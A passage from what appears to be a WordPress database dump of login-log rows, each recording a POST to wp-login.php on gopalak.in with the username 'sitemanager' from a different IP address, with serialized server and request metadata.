00:00:00'),(94275,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41340\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.141.222\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745564215.328126;s:12:\"REQUEST_TIME\";i:1745564215;}}','66.29.141.222',0,'2025-04-25 12:26:57','1970-01-01 00:00:00'),(94276,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"17420\";s:11:\"REMOTE_ADDR\";s:15:\"103.161.173.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745564645.8078251;s:12:\"REQUEST_TIME\";i:1745564645;}}','103.161.173.219',0,'2025-04-25 12:34:07','1970-01-01 00:00:00'),(94277,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38699\";s:11:\"REMOTE_ADDR\";s:13:\"5.101.157.247\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745565072.801168;s:12:\"REQUEST_TIME\";i:1745565072;}}','5.101.157.247',0,'2025-04-25 12:41:14','1970-01-01 00:00:00'),(94278,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56024\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.13\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745565506.4871211;s:12:\"REQUEST_TIME\";i:1745565506;}}','198.54.114.13',0,'2025-04-25 12:48:28','1970-01-01 00:00:00'),(94279,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52522\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.133\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745565933.2846911;s:12:\"REQUEST_TIME\";i:1745565933;}}','199.188.200.133',0,'2025-04-25 12:55:35','1970-01-01 00:00:00'),(94280,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33988\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745566356.5614281;s:12:\"REQUEST_TIME\";i:1745566356;}}','23.239.27.53',0,'2025-04-25 13:02:38','1970-01-01 00:00:00'),(94281,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41940\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.141.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745566781.4706769;s:12:\"REQUEST_TIME\";i:1745566781;}}','66.29.141.59',0,'2025-04-25 13:09:43','1970-01-01 00:00:00'),(94282,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58192\";s:11:\"REMOTE_ADDR\";s:14:\"103.163.214.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745567242.8790159;s:12:\"REQUEST_TIME\";i:1745567242;}}','103.163.214.43',0,'2025-04-25 13:17:24','1970-01-01 00:00:00'),(94283,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48786\";s:11:\"REMOTE_ADDR\";s:13:\"185.88.178.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745567708.025934;s:12:\"REQUEST_TIME\";i:1745567708;}}','185.88.178.89',0,'2025-04-25 13:25:09','1970-01-01 00:00:00'),(94284,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58908\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.207.168\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745568178.5471039;s:12:\"REQUEST_TIME\";i:1745568178;}}','199.188.207.168',0,'2025-04-25 13:33:00','1970-01-01 00:00:00'),(94285,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38824\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.55\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"RE